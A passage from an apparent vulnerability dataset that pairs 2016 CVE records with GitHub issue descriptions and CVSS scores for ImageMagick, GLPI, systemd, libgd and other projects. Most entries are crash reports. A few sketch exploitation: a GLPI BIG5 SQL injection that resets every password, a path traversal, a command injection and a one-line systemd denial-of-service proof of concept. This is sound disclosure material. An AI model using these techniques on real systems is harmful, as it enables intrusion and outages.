        "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/277",
        "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/277",
        "Repo_new": "weidai11/cryptopp",
        "Issue_Created_At": "2016-09-15T21:07:01Z",
        "description": "Library documentation lacks treatment of DNDEBUG and Static Initialization. From a recent discussion with the Debian Security Team: > On Thu, Sep NUMBERTAG at NUMBERTAG PM, Jeffrey Walton < EMAILTAG > wrote: > > Thanks Florian. > > > >> this matter does not seem to be something for the Debian security > >> team. Debian doesn't enable coredumps by default, and crypto++ > >> upstream doesn't document that builds without DNDEBUG are unsafe > >> (say, due to denial of service issues caused by broken asserts). > > > > Fair enough, done. We added information to both FILETAG and > > APITAG see > > URLTAG > > . > > > > Are there other places we should disseminate the information? I want > > to ensure you are looking in places I expect you to look (i.e., we are > > not suffering a disconnect). > > For completeness, the asserts are working as expected; they are not broken. The problem is many distros and developers fail to add APITAG for release/production when using the alternate build system, like Autotools and APITAG Sometimes its policy APITAG and Autotools) and sometimes its omission (regular developers under APITAG The library's build system, [GNU] Make, adds the define. The library is well configured in its default state.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2016-7445",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/843",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/843",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2016-09-16T09:51:59Z",
        "description": "null ptr dereference in APITAG Vulnerability openjpeg null ptr dereference in APITAG Version git head version ( URLTAG ) Address Sanitizer Output ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG d NUMBERTAG bp NUMBERTAG ff NUMBERTAG sp NUMBERTAG ff NUMBERTAG T NUMBERTAG d NUMBERTAG in skip_white PATHTAG NUMBERTAG d NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG in __libc_start_main NUMBERTAG a NUMBERTAG b in _start ??:? APITAG See poc.ppm Analysis In APITAG and APITAG variable s is uncheck after skip_int is called. A null ptr will be passed to skip_int again and will cause a null ptr dereference. Report Timeline NUMBERTAG FB3F NUMBERTAG of STARLAB discovered this issue Credit FB3F NUMBERTAG of STARLAB APITAG Contact us if you need APITAG file",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7507",
        "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2483",
        "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2483",
        "Repo_new": "glpi-project/glpi",
        "Issue_Created_At": "2017-07-19T07:52:19Z",
        "description": "Stored XSS and CSRF exploit. CVETAG CVETAG Thanks to Eric Carter (CS) Should be already fixed by fc NUMBERTAG a1",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.0,
        "impactScore": 5.9,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2016-7508",
        "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/1047",
        "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/1047",
        "Repo_new": "glpi-project/glpi",
        "Issue_Created_At": "2016-09-23T13:29:00Z",
        "description": "SQL injection with SET NAMES. CVETAG Thanks to Eric Carter (CS) APITAG Vectors] Prerequisite: the administrator of GLPI must have defined the variable $dbenc='big5' in PATHTAG to support asian encoding. It will then be possible to do SQL injection in almost all the forms of the application. For the proof of concept, the attacker targeted the APITAG form input in the User profile by adding the characters [ELIDED] before the SQL code (the request must be sent using Unicode encoding) :[ELIDED]', APITAG x Once received by the server, the request will be sanitized, giving :[ELIDED] , APITAG x The value will then be sent to the database with a BIG5 encoding. Here is the critical point, as BIG5 will see the string [ELIDED]\\ as a single asian character encoded on two bytes. As the single quote isn't escaped anymore, the SQL code will be executed and will set the password of every account to the value APITAG (=MD5 hash of \"ximaz\" string)",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 5.9,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2016-7514",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/83",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/83",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-13T11:40:06Z",
        "description": "out of bounds read in APITAG APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7515",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/82",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/82",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-13T03:15:41Z",
        "description": "heap buffer overflow in APITAG APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7516",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/77",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/77",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-13T03:14:08Z",
        "description": "out of bounds read in APITAG APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7517",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/80",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/80",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-13T03:15:09Z",
        "description": "heap buffer overflow in APITAG APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7518",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/81",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/81",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-13T03:15:26Z",
        "description": "heap buffer overflow in APITAG APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7520",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/90",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/90",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-22T21:50:37Z",
        "description": "heap buffer overflow in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7521",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/92",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/92",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-24T01:28:42Z",
        "description": "heap buffer overflow in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7522",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/93",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/93",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-24T01:28:55Z",
        "description": "heap buffer overflow in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7523",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/94",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/94",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-24T01:29:08Z",
        "description": "heap buffer overflow in APITAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7524",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/96",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/96",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-24T01:29:30Z",
        "description": "heap buffer overflow in APITAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7525",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/98",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/98",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-24T01:29:49Z",
        "description": "heap buffer overflow in PATHTAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7526",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/102",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/102",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-28T12:55:52Z",
        "description": "out of bounds write in PATHTAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7527",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/122",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/122",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-02-05T00:53:51Z",
        "description": "out of bounds read in APITAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7528",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/99",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/99",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-24T01:29:58Z",
        "description": "SEGV in APITAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7529",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/104",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/104",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-28T12:56:13Z",
        "description": "out of bounds read in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7529",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/103",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/103",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-28T12:56:03Z",
        "description": "out of bounds read in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7530",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/110",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/110",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-28T12:57:17Z",
        "description": "SIGFPE, Arithmetic exception in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7530",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/105",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/105",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-28T12:56:26Z",
        "description": "out of bounds write in PATHTAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7531",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/107",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/107",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-28T12:56:46Z",
        "description": "out of bounds write in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7532",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/109",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/109",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-01-28T12:57:05Z",
        "description": "out of bounds read in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7533",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/120",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/120",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-02-05T00:51:56Z",
        "description": "out of bounds read in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7534",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/126",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/126",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-02-07T05:52:38Z",
        "description": "out of bounds write in PATHTAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7535",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/128",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/128",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-02-12T22:30:21Z",
        "description": "out of bounds write in APITAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7536",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/130",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/130",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-02-14T01:24:01Z",
        "description": "SEGV in PATHTAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7537",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/143",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/143",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-03-04T21:29:58Z",
        "description": "out of bounds read in APITAG CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7538",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/148",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/148",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-03-11T20:48:22Z",
        "description": "out of bounds write in APITAG . CVETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7544",
        "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/302",
        "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/302",
        "Repo_new": "weidai11/cryptopp",
        "Issue_Created_At": "2016-09-23T01:16:51Z",
        "description": "AES and incorrect argument to APITAG under Microsoft compilers. John Byrd reported a crash in AES under Microsoft compilers due to use of APITAG , APITAG and APITAG . APITAG and APITAG are Microsoft SDLC functions ( alloca is on Microsoft's SDLC banned function list URLTAG . Microsoft sometimes uses the heap rather than the stack for APITAG , and that's the reason APITAG is needed. The bug is specific to Windows and Microsoft compilers. The bug does not affect Unix and Linux; and does not affect non Microsoft compilers, like ICC and Borland. The bug was introduced at Commit NUMBERTAG bc NUMBERTAG da NUMBERTAG a3 URLTAG and only affects Crypto NUMBERTAG The code in question asks APITAG for a block of memory. The also over commits the size and adjust the pointer to a NUMBERTAG byte boundary. The pointer is sent APITAG to flush cache lines. If APITAG cannot perform the flush, then it returns false. Upon the false return, the code in reallocates, ajusts the pinter and calls APITAG again. Eventually the call succeeds. After the code in question completes, it frees the adjusted pointer and not the original pointer using APITAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7568",
        "Issue_Url_old": "https://github.com/libgd/libgd/issues/308",
        "Issue_Url_new": "https://github.com/libgd/libgd/issues/308",
        "Repo_new": "libgd/libgd",
        "Issue_Created_At": "2016-09-21T10:44:14Z",
        "description": "Integer Overflow in APITAG of gd_webp.c. DESCRIPTION ============== An integer overflow issue was found in function APITAG of file gd_webp.c which could lead to heap buffer overflow . CREDIT ============== This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB . VULNERABILITY DETAILS ============== The bad code lies in function APITAG of file gd_webp.c . APITAG There is no overflow check before calling the APITAG function. Actually, an integer overflow can be happened here. For example NUMBERTAG Overflow NUMBERTAG The buffer will be overflowed in the following for loop. CODETAG POC ============== This issue was reported to PHP originally. So currently the proof of concept file is only available for PHP. But I think it's not hard to write a APITAG for libgd. CODETAG EXCEPTION LOG ============== Also, the exception log was generated by PHP. ERRORTAG PATCH ============== It's very easy to write a patch for this issue. Just call function overflow2 to check if overflow exists or not before calling function APITAG . APITAG TIMELINE ============== PATHTAG Report to PHP as BUG NUMBERTAG CVETAG PATHTAG Wrote a patch and created a pull request URLTAG for libgd PATHTAG Wrote a patch and created a pull request URLTAG for php src PATHTAG Fixed in PHP via NUMBERTAG df NUMBERTAG URLTAG and c NUMBERTAG e URLTAG PATHTAG Fixed in libgd via NUMBERTAG bec0f URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7569",
        "Issue_Url_old": "https://github.com/appc/docker2aci/issues/201",
        "Issue_Url_new": "https://github.com/appc/docker2aci/issues/201",
        "Repo_new": "appc/docker2aci",
        "Issue_Created_At": "2016-09-27T15:27:16Z",
        "description": "Path traversals present in image converting. Description > in code reviewing, i found a path traversal vulnerability in docker's image converting using docker2aci, there must be a possibility that it extracts embedded layer data to arbitrary directories or paths since no essential check for file path, RCE or privilege escalation would be performed. > it is indeed true that i tested the issue by building a malicious image, if running as root, arbitrary file could be written into arbitrary paths, like backdoors, or running as unprivileged user, arbitrary files also could be extracted to some paths within the capabilities of current user. > It is quite critical, right ? Could you request a CVE for that ?",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-7793",
        "Issue_Url_old": "https://github.com/sociomantic-tsunami/git-hub/issues/197",
        "Issue_Url_new": "https://github.com/sociomantic-tsunami/git-hub/issues/197",
        "Repo_new": "sociomantic-tsunami/git-hub",
        "Issue_Created_At": "2016-09-06T20:42:18Z",
        "description": "Missing sanitization of data received from APITAG git hub trusts data received from APITAG and passes it unsanitized to the git command. Malicious APITAG operators could exploit this to execute arbitrary code. For example, if APITAG reported the repository name as APITAG and the repository URL as APITAG then this would happen: ERRORTAG With Python before NUMBERTAG which didn't verify certificates by default, this bug could be also exploited by man in the middle attackers.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7795",
        "Issue_Url_old": "https://github.com/systemd/systemd/issues/4234",
        "Issue_Url_new": "https://github.com/systemd/systemd/issues/4234",
        "Repo_new": "systemd/systemd",
        "Issue_Created_At": "2016-09-28T19:14:07Z",
        "description": "Assertion failure when PID NUMBERTAG receives a zero length message over notify socket. systemd fails an assertion in manager_invoke_notify_message URLTAG when a zero length message is received over PATHTAG This allows a local user to perform a denial of service attack against PID NUMBERTAG Proof of concept: PATHTAG systemd notify \"\"",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2016-7798",
        "Issue_Url_old": "https://github.com/ruby/openssl/issues/49",
        "Issue_Url_new": "https://github.com/ruby/openssl/issues/49",
        "Repo_new": "ruby/openssl",
        "Issue_Created_At": "2016-03-27T15:13:53Z",
        "description": "Possible bug: order of setting key vs. IV affects encryption with AES GCM. Hello, I think I may have found a possible bug in the ruby openssl code for encryption. If initialization vector is set _before_ setting the encryption key when using one of the APITAG algorithms, the encryption does not take the IV into account at all and two different IVs (with the same key) produce the same encrypted ciphertext. If IV is set _after_ the key, everything behaves perfectly OK. This issue does not affect other algorithms, only the AES GCM ones. APITAG more context about how I came to this conclusion, please see this stack overflow question URLTAG and this pull request URLTAG in the encryptor gem._ Let me first show a simple test in ruby, to prove this issue: CODETAG When you run this test file, you'll get these results: CODETAG The critical lines are lines NUMBERTAG and NUMBERTAG They show that when the IV is set before the encryption key, the IV is not taken into account. Lines NUMBERTAG show that it this behavior is not present in the CBC encryption mode. I tried to do further tests and they suggest that this behavior is caused by the pre initialization of the encryption key in APITAG URLTAG . In the following test, I tried to closely mimic the C calls that ruby openssl makes when doing a very simple encryption task: ERRORTAG The test tries to encrypt the same data as in the ruby test above, with IV set before / after the key and with or without the pre initialization of the key. Compiling and running the test reveals the following: CODETAG The test shows that when the key pre initialization (i.e. setting the key to all zeroes when configuring the cipher) is skipped, the IV, even if set before the encryption key, is correctly taken into account. On the other hand, when the pre initialization takes place, the IV must be set after the key for the data to be encrypted correctly. I have not experienced any seg faults when not preinitializing the key (a warning about this is present in the comment above the preinitialization code). I compiled and tested the code above against master branch of openssl URLTAG as well as APITAG with the same results. Overall, this behavior seems to me like a bug. Nowhere in the ruby openssl documentation I have found any mention about the order of setting IV vs key being relevant for the encryption process . I believe this should perhaps be more explicitly documented, because accidental setting IVs before keys with GCM algorithms would lead to a severe weakening of the whole encryption , without the user being warned in any way. What do you think? Let me know if you need further info and thanks!",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2016-7799",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/280",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/280",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2016-09-30T10:18:19Z",
        "description": "imagemagick mogrify global buffer overflow. Hi, the following test case will reproduce this crash. It's attached, you need a ASAN build on master branch > \u279c utilities git:(master) \u2717 ./magick mogrify PATHTAG > APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG a NUMBERTAG fc at pc NUMBERTAG c9ba bp NUMBERTAG ffdffbaac NUMBERTAG sp NUMBERTAG ffdffbaac NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG fc thread T NUMBERTAG c9b9 ( PATHTAG NUMBERTAG f ( PATHTAG NUMBERTAG bed NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff1c7f ( PATHTAG NUMBERTAG f8cead ( PATHTAG NUMBERTAG f5da9 ( PATHTAG NUMBERTAG f NUMBERTAG a6b NUMBERTAG f ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG fc is located NUMBERTAG bytes to the left of global variable 'format_bytes' defined in APITAG NUMBERTAG a NUMBERTAG of size NUMBERTAG a NUMBERTAG fc is located NUMBERTAG bytes to the right of global variable '<string literal>' defined in APITAG NUMBERTAG a NUMBERTAG c0) of size NUMBERTAG string literal>' is ascii string APITAG > SUMMARY: APITAG global buffer overflow ( PATHTAG ) > Shadow bytes around the buggy address NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2016-7835",
        "Issue_Url_old": "https://github.com/h2o/h2o/issues/1144",
        "Issue_Url_new": "https://github.com/h2o/h2o/issues/1144",
        "Repo_new": "h2o/h2o",
        "Issue_Created_At": "2016-12-20T06:16:27Z",
        "description": "_.",
